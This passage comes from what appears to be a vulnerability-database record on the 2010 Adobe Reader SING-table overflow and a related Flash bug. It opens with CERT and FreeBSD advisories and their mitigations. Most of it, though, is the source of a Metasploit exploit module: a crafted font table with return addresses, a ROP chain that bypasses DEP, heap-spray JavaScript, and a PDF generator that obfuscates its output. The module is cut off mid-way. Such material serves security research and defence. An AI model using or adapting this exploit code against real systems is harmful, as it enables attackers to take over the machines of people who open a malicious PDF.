\nRepeatability: \nReferences: http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html \nDate public: 09/08/2010 \nCVE Url: \n\n", "edition": 2, "modified": "2010-09-09T22:00:00", "published": "2010-09-09T22:00:00", "id": "ACROBAT_TTF_SING", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/acrobat_ttf_sing", "type": "canvas", "title": "Immunity Canvas: ACROBAT_TTF_SING", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:42:08", "bulletinFamily": "info", "cvelist": ["CVE-2010-2884"], "description": "### Overview \n\nAdobe Flash contains an unspecified vulnerability that can allow a remote, unauthenticated attacker to execute arbitrary code.\n\n### Description \n\nAdobe Flash contains a vulnerability that can result in memory corruption, which can allow arbitrary code execution. See also Adobe Security Advisory [APSA10-03](<http://www.adobe.com/support/security/advisories/apsa10-03.html>) and Adobe Security Bulletin [APSB10-22](<http://www.adobe.com/support/security/bulletins/apsb10-22.html>).\n\nNote that separate instances of Flash are provided in a variety of Adobe products, including Adobe Reader and Acrobat. Updating Flash Player does not update the Flash runtime included in other products. \n \n--- \n \n### Impact \n\nBy convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), PDF file, Microsoft Office document, or any other document that supports embedded SWF content, an attacker may be able to execute arbitrary code. The vulnerability reportedly affects Flash Player 10.1.82.76 and earlier versions for Windows, Macintosh, Linux, and Solaris, Flash Player 10.1.92.10 for Android, and Adobe Reader and Acrobat 9.3.4 and earlier. \n \n--- \n \n### Solution \n\n**Apply an update** \nThis issue is addressed in Adobe Security Bulletin [APSB10-22](<http://www.adobe.com/support/security/bulletins/apsb10-22.html>). This bulletin describes Flash Player 10.1.85.3 for Windows, Macintosh, Linux, and Solaris, Flash Player 10.1.92.10 for Android, and Google Chrome 6.0.472.62, which address this issue. \n \n--- \n \n \n**Disable Flash in your web browser** \n \nDisable Flash or selectively enable Flash content as described in [Securing Your Web Browser](<http://www.us-cert.gov/reading_room/securing_browser/>). \n \n**Disable Flash and 3D & Multimedia support in Adobe Reader 9** \n \nFlash and 3D & Multimedia support are implemented as plug-in libraries in Adobe Reader. Disabling Flash in Adobe Reader will only mitigate attacks that use an SWF embedded in a PDF file. Disabling 3D & Multimedia support does not directly address the vulnerability, but it does provide additional mitigation and results not in a crash but in a more user-friendly error message. \n \nTo disable Flash and 3D & Multimedia support in Adobe Reader 9 on Microsoft Windows, delete or rename these files: \n`\"%ProgramFiles%\\Adobe\\Reader 9.0\\Reader\\authplay.dll\"` \n`\"%ProgramFiles%\\Adobe\\Reader 9.0\\Reader\\rt3d.dll\"` \nFor Apple Mac OS X, delete or rename these files: \n`\"/Applications/Adobe Reader 9/Adobe Reader.app/Contents/Frameworks/AuthPlayLib.bundle\"` \n`\"/Applications/Adobe Reader 9/Adobe Reader.app/Contents/Frameworks/Adobe3D.framework\"` \nFor GNU/Linux, delete or rename these files (locations may vary among distributions): \n`\"/opt/Adobe/Reader9/Reader/intellinux/lib/libauthplay.so\"` \n`\"/opt/Adobe/Reader9/Reader/intellinux/lib/librt3d.so\"` \nFile locations may be different for Adobe Acrobat or other Adobe products that include Flash and 3D & Multimedia support. Disabling these plug-ins will reduce functionality and will not protect against SWF files hosted on websites. Depending on the update schedule for products other than Flash Player, consider leaving Flash and 3D & Multimedia support disabled unless they are absolutely required. \n \n**Remove Flash** \n \nAdobe has provided a [TechNote](<http://kb2.adobe.com/cps/141/tn_14157.html>) with utilities for uninstalling the Flash Player plug-in and ActiveX control on Windows and Mac OS X systems. Removing these components can mitigate the web browser attack vector for this vulnerability. Note that this will not remove the instances of Flash Player that are installed with Adobe Reader or other Adobe products. \n \n**Disable JavaScript in Adobe Reader and Acrobat** \n \nDisabling JavaScript can help mitigate some techniques that use Adobe Reader as an attack vector. \n \nTo disable JavaScript in Adobe Reader:\n\n 1. Open Adobe Acrobat Reader.\n 2. Open the `Edit` menu.\n 3. Choose the `Preferences...` option.\n 4. Choose the `JavaScript` section.\n 5. Uncheck the `Enable Acrobat JavaScript` checkbox.\nDisabling JavaScript will not resolve the vulnerabilities, it will only disable the vulnerable JavaScript component. When JavaScript is disabled, Adobe Reader and Acrobat prompt to re-enable JavaScript when opening a PDF that contains JavaScript. \n \n**Prevent Internet Explorer from automatically opening PDF documents** \n \nThe installer for Adobe Reader and Acrobat configures Internet Explorer to automatically open PDF files without any user interaction. This behavior can be reverted to the safer option of prompting the user by importing the following as a .REG file: \n \n`Windows Registry Editor Version 5.00` \n \n`[HKEY_CLASSES_ROOT\\AcroExch.Document.7]` \n`\"EditFlags\"=hex:00,00,00,00` \n**Disable the displaying of PDF documents in the web browser** \n \nPreventing PDF documents from opening inside a web browser reduces the attack surface. If this workaround is applied to updated versions of Adobe Reader and Acrobat, it may protect against future vulnerabilities. \n \nTo prevent PDF documents from automatically opening in a web browser with Adobe Reader:\n\n 1. Open Adobe Acrobat Reader.\n 2. Open the `Edit` menu.\n 3. Choose the `Preferences...` option.\n 4. Choose the `Internet` section.\n 5. Uncheck the `Display PDF in browser` checkbox.\n**Enable DEP in Microsoft Windows** \n \nConsider enabling Data Execution Prevention (DEP) in supported versions of Windows. DEP should not be treated as a complete workaround, but it can mitigate the execution of attacker-supplied code in some cases. Microsoft has published detailed technical information about DEP in Security Research & Defense blog posts \"Understanding DEP as a mitigation technology\" [part 1](<http://blogs.technet.com/srd/archive/2009/06/05/understanding-dep-as-a-mitigation-technology-part-1.aspx>) and [part 2](<http://blogs.technet.com/srd/archive/2009/06/12/understanding-dep-as-a-mitigation-technology-part-2.aspx>). DEP should be used in conjunction with the application of patches or other mitigations described in this document. \n--- \n \n### Vendor Information\n\n275289\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Adobe Affected\n\nNotified: September 10, 2010 Updated: September 21, 2010 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.adobe.com/support/security/bulletins/apsb10-22.html>\n * <http://www.adobe.com/support/security/advisories/apsa10-03.html>\n * <http://blogs.adobe.com/psirt/2010/09/security-advisory-for-adobe-flash-player-apsa10-03.html>\n\n### Google Affected\n\nUpdated: September 21, 2010 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://googlechromereleases.blogspot.com/2010/09/stable-beta-channel-updates_17.html>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://www.adobe.com/support/security/advisories/apsa10-03.html>\n * <http://blogs.adobe.com/psirt/2010/09/security-advisory-for-adobe-flash-player-apsa10-03.html>\n\n### Acknowledgements\n\nThe vendor credits Bo Qu of Palo Alto Networks.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2010-2884](<http://web.nvd.nist.gov/vuln/detail/CVE-2010-2884>) \n---|--- \n**Severity Metric:** | 31.59 \n**Date Public:** | 2010-09-13 \n**Date First Published:** | 2010-09-14 \n**Date Last Updated: ** | 2010-09-21 13:05 UTC \n**Document Revision: ** | 15 \n", "modified": "2010-09-21T13:05:00", "published": "2010-09-14T00:00:00", "id": "VU:275289", "href": "https://www.kb.cert.org/vuls/id/275289", "type": "cert", "title": "Adobe Flash unspecified code execution vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-18T20:42:08", "bulletinFamily": "info", "cvelist": ["CVE-2010-2883"], "description": "### Overview \n\nA vulnerability has been discovered in Adobe Reader and Acrobat that may be exploited to run arbitrary code.\n\n### Description \n\nA critical vulnerability exists in the font parsing code of CoolType.dll. A vulnerable strcat call is used when parsing data within the \"SING\" table of a TrueType font. The vulnerability has been confirmed in versions 8.2.4 and 9.3.4 of both Reader and Acrobat. Older versions may also be affected. There have been reports of this vulnerability being actively exploited in the wild. \n \n--- \n \n### Impact \n\nAn attacker may use a specifically crafted PDF document to cause a crash or execute arbitrary code. \n \n--- \n \n### Solution \n\n**Apply an update**\n\nAdobe recommends all users upgrade to Adobe Reader and Acrobat 9.4 or 8.2.5. [APSB10-21](<http://www.adobe.com/support/security/bulletins/apsb10-21.html>) contains more details. \n \n--- \n \n \n**Force DEP/ASLR** \n \nMicrosoft's Enhanced Mitigation Experience Toolkit may be used to mitigate the effects of the exploit. Further details can be found on Microsoft's [TechNet Blog](<http://blogs.technet.com/b/srd/archive/2010/09/10/use-emet-2-0-to-block-the-adobe-0-day-exploit.aspx>). \n \n**Disable JavaScript in Adobe Reader and Acrobat** \n \nDisabling JavaScript prevents these vulnerabilities from being exploited and reduces attack surface. If this workaround is applied to updated versions of Adobe Reader and Acrobat, it may protect against future vulnerabilities. \n \nTo disable JavaScript in Adobe Reader:\n\n 1. Open Adobe Acrobat Reader. \n 2. Open the Edit menu. \n 3. Choose the Preferences... option. \n 4. Choose the JavaScript section. \n 5. Uncheck the Enable Acrobat JavaScript checkbox.\nDisabling JavaScript will not resolve the vulnerabilities, it will only disable the vulnerable JavaScript component. When JavaScript is disabled, Adobe Reader and Acrobat prompt to re-enable JavaScript when opening a PDF that contains JavaScript. \n** \nPrevent Internet Explorer from automatically opening PDF documents** \n \nThe installer for Adobe Reader and Acrobat configures Internet Explorer to automatically open PDF files without any user interaction. This behavior can be reverted to the safer option of prompting the user by importing the following as a .REG file: \n \n`Windows Registry Editor Version 5.00`` \n`` \n[HKEY_CLASSES_ROOT\\AcroExch.Document.7] \n\"EditFlags\"=hex:00,00,00,00` \n**Disable the displaying of PDF documents in the web browser** \n \nPreventing PDF documents from opening inside a web browser reduces attack surface. If this workaround is applied to updated versions of Adobe Reader and Acrobat, it may protect against future vulnerabilities. \n \nTo prevent PDF documents from automatically being opened in a web browser with Adobe Reader:\n\n 1. Open Adobe Acrobat Reader. \n 2. Open the Edit menu. \n 3. Choose the Preferences... option. \n 4. Choose the Internet section. \n 5. Uncheck the Display PDF in browser checkbox. \n--- \n \n### Vendor Information\n\n491991\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Adobe Affected\n\nUpdated: September 14, 2010 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://secunia.com/advisories/41340>\n * <http://community.websense.com/blogs/securitylabs/archive/2010/09/10/brief-analysis-on-adobe-reader-sing-table-parsing-vulnerability-cve-2010-2883.aspx>\n * <http://blog.metasploit.com/2010/09/return-of-unpublished-adobe.html>\n * <http://www.adobe.com/support/security/bulletins/apsb10-21.html>\n * <http://blogs.technet.com/b/srd/archive/2010/09/10/use-emet-2-0-to-block-the-adobe-0-day-exploit.aspx>\n\n### Acknowledgements\n\nThis document was written by Jared Allar.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2010-2883](<http://web.nvd.nist.gov/vuln/detail/CVE-2010-2883>) \n---|--- \n**Severity Metric:** | 61.51 \n**Date Public:** | 2010-09-14 \n**Date First Published:** | 2010-09-14 \n**Date Last Updated: ** | 2010-10-29 15:00 UTC \n**Document Revision: ** | 31 \n", "modified": "2010-10-29T15:00:00", "published": "2010-09-14T00:00:00", "id": "VU:491991", "href": "https://www.kb.cert.org/vuls/id/491991", "type": "cert", "title": "Adobe Reader and Acrobat Font Parsing Buffer Overflow Vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:05", "bulletinFamily": "unix", "cvelist": ["CVE-2010-2884"], "description": "\nAdobe Product Security Incident Response Team reports:\n\nA critical vulnerability exists in Adobe Flash Player\n\t 10.1.82.76 and earlier versions for Windows, Macintosh,\n\t Linux, Solaris, and Adobe Flash Player 10.1.92.10 for\n\t Android. This vulnerability also affects Adobe Reader\n\t 9.3.4 and earlier versions for Windows, Macintosh and\n\t UNIX, and Adobe Acrobat 9.3.4 and earlier versions for\n\t Windows and Macintosh. This vulnerability (CVE-2010-2884)\n\t could cause a crash and potentially allow an attacker\n\t to take control of the affected system. There are\n\t reports that this vulnerability is being actively\n\t exploited in the wild against Adobe Flash Player on\n\t Windows. Adobe is not aware of any attacks exploiting\n\t this vulnerability against Adobe Reader or Acrobat to\n\t date.\n\n", "edition": 4, "modified": "2010-09-14T00:00:00", "published": "2010-09-14T00:00:00", "id": "8A34D9E6-C662-11DF-B2E1-001B2134EF46", "href": "https://vuxml.freebsd.org/freebsd/8a34d9e6-c662-11df-b2e1-001b2134ef46.html", "title": "linux-flashplugin -- remote code execution", "type": "freebsd", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-08-27T01:30:05", "description": "This module exploits a vulnerability in the Smart INdependent Glyplets (SING) table handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are assumed to be vulnerable as well.\n", "published": "2010-09-08T23:05:18", "type": "metasploit", "title": "Adobe CoolType SING Table \"uniqueName\" Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-2883"], "modified": "2020-01-15T01:47:27", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/ADOBE_COOLTYPE_SING", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking # aslr+dep bypass, js heap spray, rop, stack bof\n\n include Msf::Exploit::FILEFORMAT\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe CoolType SING Table \"uniqueName\" Stack Buffer Overflow',\n 'Description' => %q{\n This module exploits a vulnerability in the Smart INdependent Glyplets (SING) table\n handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are\n assumed to be vulnerable as well.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # 0day found in the wild\n 'sn0wfl0w', # initial analysis, also @vicheck on twitter\n 'jduck' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2010-2883' ],\n [ 'OSVDB', '67849'],\n [ 'URL', 'http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html' ],\n [ 'URL', 'http://www.adobe.com/support/security/advisories/apsa10-02.html' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',\n 'DisablePayloadHandler' => true\n },\n 'Payload' =>\n {\n 'Space' => 1000,\n 'BadChars' => \"\\x00\",\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # Tested OK via Adobe Reader 9.3.4 on Windows XP SP3 -jjd\n # Tested OK via Adobe Reader 9.3.4 on Windows 7 -jjd\n # Tested OK via Adobe Reader 9.3 on XP and 7 -todb\n [ 'Automatic', { }],\n ],\n 'DisclosureDate' => 'Sep 07 2010',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),\n ])\n end\n\n def exploit\n ttf_data = make_ttf()\n\n js_data = make_js(payload.encoded)\n\n # Create the pdf\n pdf = make_pdf(ttf_data, js_data)\n\n print_status(\"Creating '#{datastore['FILENAME']}' file...\")\n\n file_create(pdf)\n end\n\n def make_ttf\n ttf_data = \"\"\n\n # load the static ttf file\n\n # NOTE: The 0day used Vera.ttf (785d2fd45984c6548763ae6702d83e20)\n path = File.join( Msf::Config.data_directory, \"exploits\", \"cve-2010-2883.ttf\" )\n fd = File.open( path, \"rb\" )\n ttf_data = fd.read(fd.stat.size)\n fd.close\n\n # Build the SING table\n sing = ''\n sing << [\n 0, 1, # tableVersionMajor, tableVersionMinor (0.1)\n 0xe01, # glyphletVersion\n 0x100, # embeddingInfo\n 0, # mainGID\n 0, # unitsPerEm\n 0, # vertAdvance\n 0x3a00 # vertOrigin\n ].pack('vvvvvvvv')\n # uniqueName\n # \"The uniqueName string must be a string of at most 27 7-bit ASCII characters\"\n #sing << \"A\" * (0x254 - sing.length)\n sing << rand_text(0x254 - sing.length)\n\n # 0xffffffff gets written here @ 0x7001400 (in BIB.dll)\n sing[0x140, 4] = [0x4a8a08e2 - 0x1c].pack('V')\n\n # This becomes our new EIP (puts esp to stack buffer)\n ret = 0x4a80cb38 # add ebp, 0x794 / leave / ret\n sing[0x208, 4] = [ret].pack('V')\n\n # This becomes the new eip after the first return\n ret = 0x4a82a714\n sing[0x18, 4] = [ret].pack('V')\n\n # This becomes the new esp after the first return\n esp = 0x0c0c0c0c\n sing[0x1c, 4] = [esp].pack('V')\n\n # Without the following, sub_801ba57 returns 0.\n sing[0x24c, 4] = [0x6c].pack('V')\n\n ttf_data[0xec, 4] = \"SING\"\n ttf_data[0x11c, sing.length] = sing\n\n ttf_data\n end\n\n def make_js(encoded_payload)\n\n # The following executes a ret2lib using icucnv36.dll\n # The effect is to bypass DEP and execute the shellcode in an indirect way\n stack_data = [\n 0x41414141, # unused\n 0x4a8063a5, # pop ecx / ret\n 0x4a8a0000, # becomes ecx\n\n 0x4a802196, # mov [ecx],eax / ret # save whatever eax starts as\n\n 0x4a801f90, # pop eax / ret\n 0x4a84903c, # becomes eax (import for CreateFileA)\n\n # -- call CreateFileA\n 0x4a80b692, # jmp [eax]\n\n 0x4a801064, # ret\n\n 0x4a8522c8, # first arg to CreateFileA (lpFileName / pointer to \"iso88591\")\n 0x10000000, # second arg - dwDesiredAccess\n 0x00000000, # third arg - dwShareMode\n 0x00000000, # fourth arg - lpSecurityAttributes\n 0x00000002, # fifth arg - dwCreationDisposition\n 0x00000102, # sixth arg - dwFlagsAndAttributes\n 0x00000000, # seventh arg - hTemplateFile\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a801064, # becomes ecx\n\n 0x4a842db2, # xchg eax,edi / ret\n\n 0x4a802ab1, # pop ebx / ret\n 0x00000008, # becomes ebx - offset to modify\n\n #\n # This points at a neat-o block of code that ... TBD\n #\n # and [esp+ebx*2],edi\n # jne check_slash\n # ret_one:\n # mov al,1\n # ret\n # check_slash:\n # cmp al,0x2f\n # je ret_one\n # cmp al,0x41\n # jl check_lower\n # cmp al,0x5a\n # jle check_ptr\n # check_lower:\n # cmp al,0x61\n # jl ret_zero\n # cmp al,0x7a\n # jg ret_zero\n # cmp [ecx+1],0x3a\n # je ret_one\n # ret_zero:\n # xor al,al\n # ret\n #\n\n 0x4a80a8a6, # execute fun block\n\n 0x4a801f90, # pop eax / ret\n 0x4a849038, # becomes eax (import for CreateFileMappingA)\n\n # -- call CreateFileMappingA\n 0x4a80b692, # jmp [eax]\n\n 0x4a801064, # ret\n\n 0xffffffff, # arguments to CreateFileMappingA, hFile\n 0x00000000, # lpAttributes\n 0x00000040, # flProtect\n 0x00000000, # dwMaximumSizeHigh\n 0x00010000, # dwMaximumSizeLow\n 0x00000000, # lpName\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a801064, # becomes ecx\n\n 0x4a842db2, # xchg eax,edi / ret\n\n 0x4a802ab1, # pop ebx / ret\n 0x00000008, # becomes ebx - offset to modify\n\n 0x4a80a8a6, # execute fun block\n\n 0x4a801f90, # pop eax / ret\n 0x4a849030, # becomes eax (import for MapViewOfFile\n\n # -- call MapViewOfFile\n 0x4a80b692, # jmp [eax]\n\n 0x4a801064, # ret\n\n 0xffffffff, # args to MapViewOfFile - hFileMappingObject\n 0x00000022, # dwDesiredAccess\n 0x00000000, # dwFileOffsetHigh\n 0x00000000, # dwFileOffsetLow\n 0x00010000, # dwNumberOfBytesToMap\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a8a0004, # becomes ecx - writable pointer\n\n 0x4a802196, # mov [ecx],eax / ret - save map base addr\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a801064, # becomes ecx - ptr to ret\n\n 0x4a842db2, # xchg eax,edi / ret\n\n 0x4a802ab1, # pop ebx / ret\n 0x00000030, # becomes ebx - offset to modify\n\n 0x4a80a8a6, # execute fun block\n\n 0x4a801f90, # pop eax / ret\n 0x4a8a0004, # becomes eax - saved file mapping ptr\n\n 0x4a80a7d8, # mov eax,[eax] / ret - load saved mapping ptr\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a801064, # becomes ecx - ptr to ret\n\n 0x4a842db2, # xchg eax,edi / ret\n\n 0x4a802ab1, # pop ebx / ret\n 0x00000020, # becomes ebx - offset to modify\n\n 0x4a80a8a6, # execute fun block\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a801064, # becomes ecx - ptr to ret\n\n 0x4a80aedc, # lea edx,[esp+0xc] / push edx / push eax / push [esp+0xc] / push [0x4a8a093c] / call ecx / add esp, 0x10 / ret\n\n 0x4a801f90, # pop eax / ret\n 0x00000034, # becomes eax\n\n 0x4a80d585, # add eax,edx / ret\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a801064, # becomes ecx - ptr to ret\n\n 0x4a842db2, # xchg eax,edi / ret\n\n 0x4a802ab1, # pop ebx / ret\n 0x0000000a, # becomes ebx - offset to modify\n\n 0x4a80a8a6, # execute fun block\n\n 0x4a801f90, # pop eax / ret\n 0x4a849170, # becomes eax (import for memcpy)\n\n # -- call memcpy\n 0x4a80b692, # jmp [eax]\n\n 0xffffffff, # this stuff gets overwritten by the block at 0x4a80aedc, becomes ret from memcpy\n 0xffffffff, # becomes first arg to memcpy (dst)\n 0xffffffff, # becomes second arg to memcpy (src)\n 0x00001000, # becomes third arg to memcpy (length)\n #0x0000258b, # ??\n #0x4d4d4a8a, # ??\n ].pack('V*')\n\n var_unescape = rand_text_alpha(rand(100) + 1)\n var_shellcode = rand_text_alpha(rand(100) + 1)\n\n var_start = rand_text_alpha(rand(100) + 1)\n\n var_s = 0x10000\n var_c = rand_text_alpha(rand(100) + 1)\n var_b = rand_text_alpha(rand(100) + 1)\n var_d = rand_text_alpha(rand(100) + 1)\n var_3 = rand_text_alpha(rand(100) + 1)\n var_i = rand_text_alpha(rand(100) + 1)\n var_4 = rand_text_alpha(rand(100) + 1)\n\n payload_buf = ''\n payload_buf << stack_data\n payload_buf << encoded_payload\n\n escaped_payload = Rex::Text.to_unescape(payload_buf)\n\n js = %Q|\nvar #{var_unescape} = unescape;\nvar #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );\nvar #{var_c} = #{var_unescape}( \"%\" + \"u\" + \"0\" + \"c\" + \"0\" + \"c\" + \"%u\" + \"0\" + \"c\" + \"0\" + \"c\" );\nwhile (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};\n#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);\n#{var_b} += #{var_shellcode};\n#{var_b} += #{var_c};\n#{var_d} = #{var_b}.substring(0, #{var_s}/2);\nwhile(#{var_d}.length < 0x80000) #{var_d} += #{var_d};\n#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);\nvar #{var_4} = new Array();\nfor (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+\"s\";\n|\n\n js\n end\n\n def random_non_ascii_string(count)\n result = \"\"\n count.times do\n result << (rand(128) + 128).chr\n end\n result\n end\n\n def io_def(id)\n \"%d 0 obj \\n\" % id\n end\n\n def io_ref(id)\n \"%d 0 R\" % id\n end\n\n\n #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\n def n_obfu(str)\n #return str\n result = \"\"\n str.scan(/./u) do |c|\n if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\n result << \"#%x\" % c.unpack(\"C*\")[0]\n else\n result << c\n end\n end\n result\n end\n\n\n def ascii_hex_whitespace_encode(str)\n result = \"\"\n whitespace = \"\"\n str.each_byte do |b|\n result << whitespace << \"%02x\" % b\n whitespace = \" \" * (rand(3) + 1)\n end\n result << \">\"\n end\n\n\n def make_pdf(ttf, js)\n\n #swf_name = rand_text_alpha(8 + rand(8)) + \".swf\"\n\n xref = []\n eol = \"\\n\"\n endobj = \"endobj\" << eol\n\n # Randomize PDF version?\n pdf = \"%PDF-1.5\" << eol\n pdf << \"%\" << random_non_ascii_string(4) << eol\n\n # catalog\n xref << pdf.length\n pdf << io_def(1) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/Pages \") << io_ref(2) << eol\n pdf << n_obfu(\"/Type /Catalog\") << eol\n pdf << n_obfu(\"/OpenAction \") << io_ref(11) << eol\n # The AcroForm is required to get icucnv36.dll to load\n pdf << n_obfu(\"/AcroForm \") << io_ref(13) << eol\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # pages array\n xref << pdf.length\n pdf << io_def(2) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/MediaBox \") << io_ref(3) << eol\n pdf << n_obfu(\"/Resources \") << io_ref(4) << eol\n pdf << n_obfu(\"/Kids [\") << io_ref(5) << \"]\" << eol\n pdf << n_obfu(\"/Count 1\") << eol\n pdf << n_obfu(\"/Type /Pages\") << eol\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # media box\n xref << pdf.length\n pdf << io_def(3)\n pdf << \"[0 0 595 842]\" << eol\n pdf << endobj\n\n # resources\n xref << pdf.length\n pdf << io_def(4)\n pdf << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/Font \") << io_ref(6) << eol\n pdf << \">>\" << eol\n pdf << endobj\n\n # page 1\n xref << pdf.length\n pdf << io_def(5) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/Parent \") << io_ref(2) << eol\n pdf << n_obfu(\"/MediaBox \") << io_ref(3) << eol\n pdf << n_obfu(\"/Resources \") << io_ref(4) << eol\n pdf << n_obfu(\"/Contents [\") << io_ref(8) << n_obfu(\"]\") << eol\n pdf << n_obfu(\"/Type /Page\") << eol\n pdf << n_obfu(\">>\") << eol # end obj dict\n pdf << endobj\n\n # font\n xref << pdf.length\n pdf << io_def(6) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/F1 \") << io_ref(7) << eol\n pdf << \">>\" << eol\n pdf << endobj\n\n # ttf object\n xref << pdf.length\n pdf << io_def(7) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/Type /Font\") << eol\n pdf << n_obfu(\"/Subtype /TrueType\") << eol\n pdf << n_obfu(\"/Name /F1\") << eol\n pdf << n_obfu(\"/BaseFont /Cinema\") << eol\n pdf << n_obfu(\"/Widths []\") << eol\n pdf << n_obfu(\"/FontDescriptor \") << io_ref(9)\n pdf << n_obfu(\"/Encoding /MacRomanEncoding\")\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # page content\n content = \"Hello World!\"\n content = \"\" +\n \"0 g\" + eol +\n \"BT\" + eol +\n \"/F1 32 Tf\" + eol +\n \"32 Tc\" + eol +\n \"1 0 0 1 32 773.872 Tm\" + eol +\n \"(\" + content + \") Tj\" + eol +\n \"ET\"\n\n xref << pdf.length\n pdf << io_def(8) << \"<<\" << eol\n pdf << n_obfu(\"/Length %s\" % content.length) << eol\n pdf << \">>\" << eol\n pdf << \"stream\" << eol\n pdf << content << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n # font descriptor\n xref << pdf.length\n pdf << io_def(9) << n_obfu(\"<<\")\n pdf << n_obfu(\"/Type/FontDescriptor/FontName/Cinema\")\n pdf << n_obfu(\"/Flags %d\" % (2**2 + 2**6 + 2**17))\n pdf << n_obfu(\"/FontBBox [-177 -269 1123 866]\")\n pdf << n_obfu(\"/FontFile2 \") << io_ref(10)\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # ttf stream\n xref << pdf.length\n compressed = Zlib::Deflate.deflate(ttf)\n pdf << io_def(10) << n_obfu(\"<</Length %s/Filter/FlateDecode/Length1 %s>>\" % [compressed.length, ttf.length]) << eol\n pdf << \"stream\" << eol\n pdf << compressed << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n # js action\n xref << pdf.length\n pdf << io_def(11) << n_obfu(\"<<\")\n pdf << n_obfu(\"/Type/Action/S/JavaScript/JS \") + io_ref(12)\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # js stream\n xref << pdf.length\n compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))\n pdf << io_def(12) << n_obfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\n pdf << \"stream\" << eol\n pdf << compressed << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n ###\n # The following form related data is required to get icucnv36.dll to load\n ###\n\n # form object\n xref << pdf.length\n pdf << io_def(13)\n pdf << n_obfu(\"<</XFA \") << io_ref(14) << n_obfu(\">>\") << eol\n pdf << endobj\n\n # form stream\n xfa = <<-EOF\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<xdp:xdp xmlns:xdp=\"http://ns.adobe.com/xdp/\">\n<config xmlns=\"http://www.xfa.org/schema/xci/2.6/\">\n<present><pdf><interactive>1</interactive></pdf></present>\n</config>\n<template 